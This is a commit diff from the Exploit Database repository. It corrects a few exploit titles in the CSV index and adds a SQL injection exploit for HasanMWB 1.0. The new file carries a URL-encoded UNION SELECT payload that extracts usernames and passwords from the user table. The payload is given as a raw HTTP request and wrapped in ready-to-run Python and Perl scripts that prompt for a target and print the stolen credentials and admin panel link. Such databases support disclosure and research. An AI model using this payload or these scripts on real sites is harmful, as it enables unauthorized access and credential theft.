DB: 2018-12-06
2 changes to exploits/shellcodes ImageMagick - Memory Leak Apache Superset 0.23 - Remote Code Execution Wordpress Plugins Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting Apache Superset < 0.23 - Remote Code Execution WordPress Plugin Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting HasanMWB 1.0 - SQL Injection
This commit is contained in:
Offensive Security
parent
60710bbfd9
commit
516678356d
3 changed files with 105 additions and 4 deletions
|
|
@ -1,4 +1,4 @@
|
|||
# Exploit Title: Apache Superset 0.23 - Remote Code Execution
|
||||
# Exploit Title: Apache Superset < 0.23 - Remote Code Execution
|
||||
# Date: 2018-05-17
|
||||
# Exploit Author: David May (david.may@semanticbits.com)
|
||||
# Vendor Homepage: https://superset.apache.org/
|
||||
|
|
|
|||
100
exploits/php/webapps/45955.txt
Normal file
100
exploits/php/webapps/45955.txt
Normal file
|
|
@ -0,0 +1,100 @@
|
|||
# Exploit Title: HasanMWB 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 2018-12-05
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: https://sourceforge.net/projects/hasanmwb/
|
||||
# Software Link: https://netcologne.dl.sourceforge.net/project/hasanmwb/HasanMWB-v1.zip
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
|
||||
#GET /PATH/index.php?hsn=category&id=1%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d HTTP/1.1
|
||||
#Host: TARGET
|
||||
#User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
#Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
#Accept-Language: en-US,en;q=0.5
|
||||
#Accept-Encoding: gzip, deflate
|
||||
#Cookie: PHPSESSID=5lk3medj631el6lb4e77ereee5; 786e332ae62061df5c64a17076aef3ee=0li10seku22m9qr31rr8avemn2
|
||||
#DNT: 1
|
||||
#Connection: keep-alive
|
||||
#Upgrade-Insecure-Requests: 1
|
||||
#HTTP/1.1 200 OK
|
||||
#Date: Wed, 05 Dec 2018 00:24:09 GMT
|
||||
#Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
#X-Powered-By: PHP/5.6.30
|
||||
#Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
#Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
#Pragma: no-cache
|
||||
#Content-Length: 2697
|
||||
#Keep-Alive: timeout=5, max=100
|
||||
#Connection: Keep-Alive
|
||||
#Content-Type: text/html; charset=UTF-8
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
#index.php?hsn=page&id=[SQL] / $id = $_GET['id'];
|
||||
#index.php?hsn=category&id=[SQL] / $id = $_GET['id'];
|
||||
#index.php?hsn=search&q=[SQL] / $qu = $_GET['q'];
|
||||
# Etc..
|
||||
|
||||
#!/usr/bin/python
|
||||
import urllib2
|
||||
import re
|
||||
|
||||
print """
|
||||
\\\|///
|
||||
\\ - - //
|
||||
( @ @ )
|
||||
----oOOo--(_)-oOOo----
|
||||
HasanMWB 1.0 - SQL Injection
|
||||
Ihsan Sencan
|
||||
---------------Ooooo----
|
||||
( )
|
||||
ooooO ) /
|
||||
( ) (_/
|
||||
\ (
|
||||
\_)
|
||||
"""
|
||||
|
||||
s = raw_input("\nTarget:[http://localhost/[PATH]/] ")
|
||||
e = ("index.php?hsn=category&id=1")
|
||||
p = ("%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d")
|
||||
response = urllib2.urlopen(s+e+p)
|
||||
c = response.read()
|
||||
up = re.findall(r'<h2>(.*)</h2>', c)
|
||||
|
||||
print "Server: ", response.info()['server']
|
||||
print (up)
|
||||
print "Login Url:"+(s)+"panel.php"
|
||||
|
||||
|
||||
#!/usr/bin/perl
|
||||
sub clear{
|
||||
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
|
||||
clear();
|
||||
|
||||
print "**************************\n";
|
||||
print "HasanMWB 1.0 SQL Injection\n";
|
||||
print "Ihsan Sencan\n";
|
||||
print "**************************\n";
|
||||
|
||||
use LWP::UserAgent;
|
||||
print "\nTarget:[http://localhost/[PATH]/] ";
|
||||
chomp(my $target=<STDIN>);
|
||||
print "\n[!] Exploiting Progress...\n";
|
||||
print "\n";
|
||||
|
||||
$E="/index.php?hsn=category&id=%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d";
|
||||
$cc = LWP::UserAgent->new() or die "Could not initialize browser\n";
|
||||
$cc->agent('Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0');
|
||||
$host = $target . "".$E."";
|
||||
$res = $cc->request(HTTP::Request->new(GET=>$host));
|
||||
$answer = $res->content; if ($answer =~/<h2>(.*?)<\/h2>/){
|
||||
print "[+] Success !!!\n";
|
||||
print "\n[+] Detail : $1\n";
|
||||
print "$target/panel.php";
|
||||
print "\n";
|
||||
}
|
||||
else{print "\n[-]Not found.\n";
|
||||
}
|
||||
|
|
@ -10126,7 +10126,7 @@ id,file,description,date,author,type,platform,port
|
|||
45867,exploits/multiple/local/45867.txt,"Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple,
|
||||
45886,exploits/linux/local/45886.txt,"Linux - Broken uid/gid Mapping for Nested User Namespaces",2018-11-16,"Google Security Research",local,linux,
|
||||
45888,exploits/windows_x86/local/45888.py,"HTML Video Player 1.2.5 - Buffer-Overflow (SEH)",2018-11-19,"Kağan Çapar",local,windows_x86,
|
||||
45890,exploits/multiple/local/45890.sh,"ImageMagick - Memory Leak",2018-11-19,barracud4_,local,multiple,
|
||||
45890,exploits/multiple/local/45890.sh,"ImageMagick - Memory Leak",2018-11-19,ttffdd,local,multiple,
|
||||
45893,exploits/windows/local/45893.txt,"Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation",2018-11-20,"Google Security Research",local,windows,
|
||||
45907,exploits/windows_x86/local/45907.txt,"Arm Whois 3.11 - Buffer Overflow (ASLR)",2018-11-26,zephyr,local,windows_x86,
|
||||
45908,exploits/multiple/local/45908.rb,"Xorg X11 Server - SUID privilege escalation (Metasploit)",2018-11-26,Metasploit,local,multiple,
|
||||
|
|
@ -40441,8 +40441,8 @@ id,file,description,date,author,type,platform,port
|
|||
45929,exploits/linux/webapps/45929.py,"PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure",2018-12-03,ParagonSec,webapps,linux,80
|
||||
45930,exploits/php/webapps/45930.pl,"Joomla! Component JE Photo Gallery 1.1 - 'categoryid' SQL Injection",2018-12-03,"Ihsan Sencan",webapps,php,80
|
||||
45932,exploits/php/webapps/45932.txt,"PHP Server Monitor 3.3.1 - Cross-Site Request Forgery",2018-12-03,"Javier Olmedo",webapps,php,80
|
||||
45933,exploits/linux/webapps/45933.py,"Apache Superset 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux,
|
||||
45935,exploits/php/webapps/45935.txt,"Wordpress Plugins Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80
|
||||
45933,exploits/linux/webapps/45933.py,"Apache Superset < 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux,
|
||||
45935,exploits/php/webapps/45935.txt,"WordPress Plugin Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80
|
||||
45937,exploits/hardware/webapps/45937.txt,"Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Authentication Bypass",2018-12-04,Luca.Chiou,webapps,hardware,80
|
||||
45941,exploits/php/webapps/45941.txt,"DomainMOD 4.11.01 - Owner name Field Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
|
||||
45942,exploits/hardware/webapps/45942.py,"NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage",2018-12-04,hyp3rlinx,webapps,hardware,
|
||||
|
|
@ -40453,3 +40453,4 @@ id,file,description,date,author,type,platform,port
|
|||
45948,exploits/php/webapps/45948.py,"NUUO NVRMini2 3.9.1 - Authenticated Command Injection",2018-12-04,"Artem Metla",webapps,php,443
|
||||
45949,exploits/php/webapps/45949.txt,"DomainMOD 4.11.01 - Registrar Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
|
||||
45954,exploits/php/webapps/45954.txt,"FreshRSS 1.11.1 - Cross-Site Scripting",2018-12-04,Netsparker,webapps,php,80
|
||||
45955,exploits/php/webapps/45955.txt,"HasanMWB 1.0 - SQL Injection",2018-12-05,"Ihsan Sencan",webapps,php,80
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue